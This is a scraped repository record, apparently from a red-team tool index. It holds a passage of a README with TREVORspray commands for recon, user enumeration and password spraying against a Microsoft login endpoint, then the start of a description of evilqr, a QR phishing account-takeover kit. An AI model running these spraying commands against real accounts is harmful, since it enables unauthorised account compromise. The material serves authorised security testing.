\n\n```bash\n# Recon\npython3 .\u002Ftrevorspray --recon evilcorp.com\n\n# Enumerate users via OneDrive\npython3 .\u002Ftrevorspray --recon evilcorp.com -u emails.txt --threads 10\n\n# Spray against discovered\npython3 .\u002Ftrevorspray -u emails.txt -p 'Welcome123' --url https:\u002F\u002Flogin.windows.net\u002Fb43asdas-cdde-bse-ac05-2e37deadbeef\u002Foauth2\u002Ftoken\n```\n\nFor full usage instructions see [here](https:\u002F\u002Fgithub.com\u002Fblacklanternsecurity\u002FTREVORspray?tab=readme-ov-file#how-to---o365).\n\n![TREVORspray](https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F67c64f6d-527a-4b59-8dd9-b73bc68274f4)\n\n*Image used from https:\u002F\u002Fgithub.com\u002Fblacklanternsecurity\u002FTREVORspray*\n\n### [๐Ÿ”™](#tool-list)[evilqr](https:\u002F\u002Fgithub.com\u002Fkgretzky\u002Fevilqr)\n\nToolkit demonstrating another approach of a QRLJacking attack, allowing to perform remote account takeover, through sign-in QR code phishing.\n\nIt consists of a browser extension used by the attacker to extract the sign-in QR code and a server application, whi","RedTeam-Tools ๆ˜ฏไธ€ไธชไธบ็บข้˜Ÿๅ’Œๆธ—้€ๆต‹่ฏ•ๆดปๅŠจๆไพ›ๅทฅๅ…ทๅ’ŒๆŠ€ๆœฏ็š„ GitHub ไป“ๅบ“ใ€‚่ฏฅ้กน็›ฎๆ”ถๅฝ•ไบ†่ถ…่ฟ‡150็งๅทฅๅ…ทๅ’Œ่ต„ๆบ๏ผŒๆถต็›–ไปŽไฟกๆฏๆ”ถ้›†ๅˆฐๆผๆดžๅˆฉ็”จ็ญ‰ๅคšไธชๆ–น้ข๏ผŒๆ—จๅœจๅธฎๅŠฉๅฎ‰ๅ…จ็ ”็ฉถไบบๅ‘˜ๆจกๆ‹Ÿๆ”ปๅ‡ป่€…่กŒไธบไปฅ่ฏ„ไผฐ็›ฎๆ ‡็ณป็ปŸ็š„ๅฎ‰ๅ…จๆ€งใ€‚่ฟ™ไบ›ๅทฅๅ…ทๆ—ขๅŒ…ๆ‹ฌไธ“ไธบ็บข้˜Ÿ่ฎพ่ฎก็š„ไธ“ไธš่ฝฏไปถ๏ผŒไนŸๅŒ…ๅซๅฏไปฅ่ขซ็ตๆดปๅบ”็”จไบŽ็บข้˜Ÿๅœบๆ™ฏ็š„ไธ€่ˆฌๆ€งๅทฅๅ…ทใ€‚้€‚ๅˆไผไธšๅ†…้ƒจ็š„ๅฎ‰ๅ…จๅ›ข้˜Ÿ็”จไบŽๆ‰ง่กŒๅฎšๆœŸ็š„ๅฎ‰ๅ…จๅฎก่ฎกใ€ๆผๆดžๆ‰ซๆไปฅๅŠๆ”ป้˜ฒๆผ”็ปƒ็ญ‰ไปปๅŠกใ€‚่ฏทๆณจๆ„๏ผŒๆ‰€ๆœ‰ๆๆ–™ไป…ไพ›ๆ•™่‚ฒไธŽ็ ”็ฉถ็”จ้€”ใ€‚",2,"2026-06-11 03:44:05","high_star"]